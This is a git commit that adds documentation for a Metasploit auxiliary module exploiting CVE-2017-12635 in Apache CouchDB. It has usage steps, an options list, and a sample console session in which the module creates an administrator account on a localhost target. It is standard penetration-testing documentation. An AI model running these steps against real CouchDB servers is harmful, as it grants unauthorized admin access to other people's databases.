Added documentation for couchdb_2017-12635.rb

GSoC/Meterpreter_Web_Console
Hendrik Van Belleghem 2018-09-14 00:49:17 +02:00
parent 33037b6b26
commit d6847918af
1 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,50 @@
## Vulnerable Application
Apache CouchDB versions between 1.7.0 and 2.x before 2.1.1
## Verification Steps
1. ```use auxiliary/admin/http/couchdb_2017-12635```
2. ```set rhost HOSTNAME``` (required)
3. ```set user USERNAME``` (required but random value generated)
4. ```set password PASSWORD``` (required. Set to password)
5. ```exploit```
6. Generates URL for connecting to CouchDB
## Options
- rhost
- user
- password
- uripath
- rport
- roles
## Scenarios
```
msf > use auxiliary/admin/http/couchdb_2017-12635
smsf auxiliary(admin/http/couchdb_2017-12635) > set rhost localhost
rhost => localhost
msf auxiliary(admin/http/couchdb_2017-12635) > show options
Module options (auxiliary/admin/http/couchdb_2017-12635):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes CouchDB Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST localhost yes CouchDB Host
ROLES _admin yes CouchDB Roles
RPORT 5984 yes CouchDB Port
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /_users/org.couchdb.user: yes The base path
USER ZuybcfiIOSlF yes CouchDB Username
VHOST no HTTP server virtual host
msf auxiliary(admin/http/couchdb_2017-12635) > exploit
[+] User ZuybcfiIOSlF created with password password. Connect to http://localhost:5984/_utils/ to login.
[*] Auxiliary module execution completed
```